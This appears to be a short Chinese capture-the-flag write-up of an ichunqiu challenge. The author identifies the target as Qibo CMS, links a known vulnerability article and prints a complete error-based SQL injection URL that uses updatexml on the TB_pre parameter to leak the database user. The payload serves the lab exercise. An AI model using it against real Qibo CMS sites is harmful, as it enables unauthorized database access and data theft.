友链
https://www.ichunqiu.com/battalion?t=1&r=0
这道题刚做的时候是没有头绪的,看了一眼writeup
,得知要通过网站下方的备案记录来查询除网站相关信息,并进而得知该网站所使用的的cms
,但是我照着做的时候却查不出来结果,ICP/IP
官网返回说无匹配信息,于是我就参考writeup
直接搜索了齐博CMS的相关漏洞,我使用的是这一个:
http://0day5.com/archives/3300/
一个SQL
注入漏洞,我的payload
是这样构造的:
http://0fcda0b05d364ae2919c79c0386ebb055c1719c2b26941cc.game.ichunqiu.com/blog/index.php?
file=listbbs&uid=1&id=1&TB_pre=
(select * from information_schema.tables where 1=2 or (updatexml(1,concat(0x7e,(
select user()
),0x7e),1)))a%23